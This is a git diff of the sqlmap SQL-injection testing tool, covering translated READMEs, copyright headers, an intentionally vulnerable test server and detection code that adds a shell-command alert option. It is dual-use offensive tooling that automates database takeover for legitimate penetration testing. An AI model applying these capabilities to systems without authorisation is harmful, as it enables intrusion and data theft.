sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं।
|
||||
|
||||
चित्रसंवाद
|
||||
----
|
||||
|
||||
|
||||
|
||||
आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं।
|
||||
|
||||
स्थापना
|
||||
----
|
||||
|
||||
आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं।
|
||||
|
||||
प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है।
|
||||
|
||||
उपयोग
|
||||
----
|
||||
|
||||
मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है।
|
||||
|
||||
लिंक
|
||||
----
|
||||
|
||||
* मुखपृष्ठ: https://sqlmap.org
|
||||
* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* ट्विटर: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
*
|
||||
@@ -1,49 +0,0 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.
|
||||
|
||||
ეკრანის ანაბეჭდები
|
||||
----
|
||||
|
||||
|
||||
|
||||
შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.
|
||||
|
||||
ინსტალაცია
|
||||
----
|
||||
|
||||
თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით.
|
||||
|
||||
ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.
|
||||
|
||||
გამოყენება
|
||||
----
|
||||
|
||||
ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
ბმულები
|
||||
----
|
||||
|
||||
* საწყისი გვერდი: https://sqlmap.org
|
||||
* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -2,9 +2,9 @@
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalających na dostęp do systemu plików oraz wykonywanie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalających na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||
|
||||
Zrzuty ekranu
|
||||
Zrzuty ekranowe
|
||||
----
|
||||
|
||||
|
||||
@@ -33,18 +33,18 @@ Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Przykładowy wynik działania można znaleźć [tutaj](https://asciinema.org/a/46601).
|
||||
Aby uzyskać listę wszystkich dostępnych funkcji, parametrów oraz opisów ich działania wraz z przykładami użycia sqlmap zalecamy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
Przykładowy wynik działania dostępny jest [tutaj](https://asciinema.org/a/46601).
|
||||
Aby uzyskać listę wszystkich dostępnych funkcji, parametrów i opisów ich działania wraz z przykładami użycia sqlmap proponujemy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Odnośniki
|
||||
----
|
||||
|
||||
* Strona projektu: https://sqlmap.org
|
||||
* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Zgłaszanie błędów: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
|
||||
@@ -1,50 +0,0 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
|
||||
|
||||
Snímky obrazovky
|
||||
----
|
||||
|
||||
|
||||
|
||||
Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
|
||||
|
||||
Inštalácia
|
||||
----
|
||||
|
||||
Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
|
||||
|
||||
Využitie
|
||||
----
|
||||
|
||||
Na získanie zoznamu základných možností a prepínačov, použite:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Na získanie zoznamu všetkých možností a prepínačov, použite:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
|
||||
Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Linky
|
||||
----
|
||||
|
||||
* Domovská stránka: https://sqlmap.org
|
||||
* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||
|
||||
Kullanım
|
||||
----
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
beep.py - Make a beep sound
|
||||
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
cloak.py - Simple file encryption/compression utility
|
||||
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
|
||||
xrange = range
|
||||
ord = lambda _: _
|
||||
|
||||
KEY = b"E6wRbVhD0IBeCiGJ"
|
||||
KEY = b"ENWsCymUeJcXqSbD"
|
||||
|
||||
def xor(message, key):
|
||||
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
dbgtool.py - Portable executable to ASCII debug script converter
|
||||
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Removes trailing spaces from blank lines inside project files
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Stress test against Python3
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Removes duplicate entries in wordlist like files
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# sudo pip install modernize
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Runs py3diatra on all python files (prerequisite: pip install pydiatra)
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;
|
||||
|
||||
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
|
||||
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
@@ -44,8 +44,7 @@ SCHEMA = """
|
||||
CREATE TABLE users (
|
||||
id INTEGER,
|
||||
name TEXT,
|
||||
surname TEXT,
|
||||
PRIMARY KEY (id)
|
||||
surname TEXT
|
||||
);
|
||||
INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
|
||||
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
@@ -10,6 +10,7 @@ import logging
|
||||
import random
|
||||
import re
|
||||
import socket
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
from extra.beep.beep import beep
|
||||
@@ -217,7 +218,6 @@ def checkSqlInjection(place, parameter, value):
|
||||
if _ > 1:
|
||||
__ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
|
||||
unionExtended = True
|
||||
test.request._columns = test.request.columns
|
||||
test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
|
||||
title = re.sub(r"\b%d\b" % _, str(__), title)
|
||||
test.title = re.sub(r"\b%d\b" % _, str(__), test.title)
|
||||
@@ -271,18 +271,15 @@ def checkSqlInjection(place, parameter, value):
|
||||
logger.debug(debugMsg)
|
||||
continue
|
||||
|
||||
elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
|
||||
if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
|
||||
debugMsg = "skipping test '%s' because " % title
|
||||
debugMsg += "its declared DBMS is different than provided"
|
||||
logger.debug(debugMsg)
|
||||
continue
|
||||
|
||||
elif kb.reduceTests == False:
|
||||
pass
|
||||
|
||||
# Skip DBMS-specific test if it does not match the
|
||||
# previously identified DBMS (via DBMS-specific payload)
|
||||
elif injection.dbms and not intersect(payloadDbms, injection.dbms, True):
|
||||
if injection.dbms and not intersect(payloadDbms, injection.dbms, True):
|
||||
debugMsg = "skipping test '%s' because " % title
|
||||
debugMsg += "its declared DBMS is different than identified"
|
||||
logger.debug(debugMsg)
|
||||
@@ -290,7 +287,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
|
||||
# Skip DBMS-specific test if it does not match the
|
||||
# previously identified DBMS (via DBMS-specific error message)
|
||||
elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
|
||||
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
|
||||
debugMsg = "skipping test '%s' because the heuristic " % title
|
||||
debugMsg += "tests showed that the back-end DBMS "
|
||||
debugMsg += "could be '%s'" % unArrayizeValue(kb.reduceTests)
|
||||
@@ -783,8 +780,22 @@ def checkSqlInjection(place, parameter, value):
|
||||
injection.conf.regexp = conf.regexp
|
||||
injection.conf.optimize = conf.optimize
|
||||
|
||||
if conf.beep:
|
||||
beep()
|
||||
if not kb.alerted:
|
||||
if conf.beep:
|
||||
beep()
|
||||
|
||||
if conf.alert:
|
||||
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
|
||||
logger.info(infoMsg)
|
||||
|
||||
try:
|
||||
process = subprocess.Popen(conf.alert, shell=True)
|
||||
process.wait()
|
||||
except Exception as ex:
|
||||
errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex))
|
||||
logger.error(errMsg)
|
||||
|
||||
kb.alerted = True
|
||||
|
||||
# There is no need to perform this test for other
|
||||
# <where> tags
|
||||
@@ -799,7 +810,7 @@ def checkSqlInjection(place, parameter, value):
|
||||
|
||||
except KeyboardInterrupt:
|
||||
warnMsg = "user aborted during detection phase"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.multipleTargets:
|
||||
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||
@@ -815,14 +826,11 @@ def checkSqlInjection(place, parameter, value):
|
||||
choice = None
|
||||
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
|
||||
if choice:
|
||||
logger.warning("invalid value")
|
||||
logger.warn("invalid value")
|
||||
msg = "enter new verbosity level: [0-6] "
|
||||
choice = readInput(msg, default=str(conf.verbose), checkBatch=False)
|
||||
conf.verbose = int(choice)
|
||||
setVerbosity()
|
||||
if hasattr(test.request, "columns") and hasattr(test.request, "_columns"):
|
||||
test.request.columns = test.request._columns
|
||||
delattr(test.request, "_columns")
|
||||
tests.insert(0, test)
|
||||
elif choice == 'N':
|
||||
return None
|
||||
@@ -843,13 +851,15 @@ def checkSqlInjection(place, parameter, value):
|
||||
warnMsg = "in OR boolean-based injection cases, please consider usage "
|
||||
warnMsg += "of switch '--drop-set-cookie' if you experience any "
|
||||
warnMsg += "problems during data retrieval"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not checkFalsePositives(injection):
|
||||
if conf.hostname in kb.vulnHosts:
|
||||
kb.vulnHosts.remove(conf.hostname)
|
||||
|
||||
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
|
||||
injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
|
||||
|
||||
else:
|
||||
injection = None
|
||||
|
||||
@@ -966,7 +976,7 @@ def checkFalsePositives(injection):
|
||||
|
||||
if not retVal:
|
||||
warnMsg = "false positive or unexploitable injection point detected"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
kb.injection = popValue()
|
||||
|
||||
@@ -992,7 +1002,7 @@ def checkSuhosinPatch(injection):
|
||||
warnMsg = "parameter length constraining "
|
||||
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
||||
warnMsg += "Potential problems in enumeration phase can be expected"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
kb.injection = popValue()
|
||||
|
||||
@@ -1013,7 +1023,7 @@ def checkFilteredChars(injection):
|
||||
warnMsg += "filtered by the back-end server. There is a strong "
|
||||
warnMsg += "possibility that sqlmap won't be able to properly "
|
||||
warnMsg += "exploit this vulnerability"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
# inference techniques depend on character '>'
|
||||
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
||||
@@ -1021,7 +1031,7 @@ def checkFilteredChars(injection):
|
||||
warnMsg = "it appears that the character '>' is "
|
||||
warnMsg += "filtered by the back-end server. You are strongly "
|
||||
warnMsg += "advised to rerun with the '--tamper=between'"
|
||||
